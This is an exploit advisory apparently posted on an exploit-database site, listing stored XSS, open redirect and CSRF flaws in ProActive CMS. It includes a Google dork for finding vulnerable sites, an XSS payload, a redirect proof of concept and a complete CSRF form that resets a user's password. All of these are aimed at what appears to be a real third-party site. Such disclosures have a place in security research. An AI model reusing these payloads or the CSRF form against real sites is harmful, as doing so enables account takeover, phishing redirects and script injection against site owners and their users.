ProActive CMS XSS & CSRF & Open Redirect

2013.01.15
Credit: Rafay Baloch
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: ProActive CMS Multiple Vulnerabilities # Google Dork: intext:"Powered by Proactive CMS" # Exploit Author: Rafay Baloch # Vendor Homepage: http://www.proactivecms.com # Tested on: Linux Stored Cross Site Scripting: http://professional.inbusiness.com.au/admin.php?action=newuser Insert Your Payload: "><img src=x onerror=prompt(0);> The newuser field does not properly sanitize the input, resulting in a Stored XSS. An Open redirect issue also found: POC: http://professional.inbusiness.com.au/admin.php?action=http://rafayhackingarticles.net Just, replace http://rafayhackingarticles.net with your own domain. Missing CSRF Tokens: Most of the forms are missing with CSRF tokens, To be honest one of the most insecure cms i have ever seen. http://professional.inbusiness.com.au/admin.php?action=edituser&id=24 The following POC, could be altered to use it to alter a user's detail. <html> <body> <form action=" http://professional.inbusiness.com.au/admin.php?action=saveuser&id=24" method="POST"> <input type="hidden" name="groupreadvalue" value="" /> <input type="hidden" name="groupreadallvalue" value="" /> <input type="hidden" name="id" value="24" /> <input type="hidden" name="password1" value="tony123" /> <input type="hidden" name="firstname" value="Tony" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="initials" value="V" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="lastname" value="Badger" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="dob" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="email" value="tony&#46;badger&#64;sales&#46;fake&#46;com" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="telephone" value="&#43;13" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="mobile" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="url" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="suburb" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="postcode" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="business&#95;name" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="division" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="position" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="building" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="x" value="30" /> <input type="hidden" name="y" value="10" /> <input type="hidden" name="groupReadList" value="&#44;Sales" /> <input type="submit" value="Submit form" /> </form> </body> </html> RHA: http://rafayhackingarticles.net http://twitter.com/rafaybaloch

References:

http://www.proactivecms.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top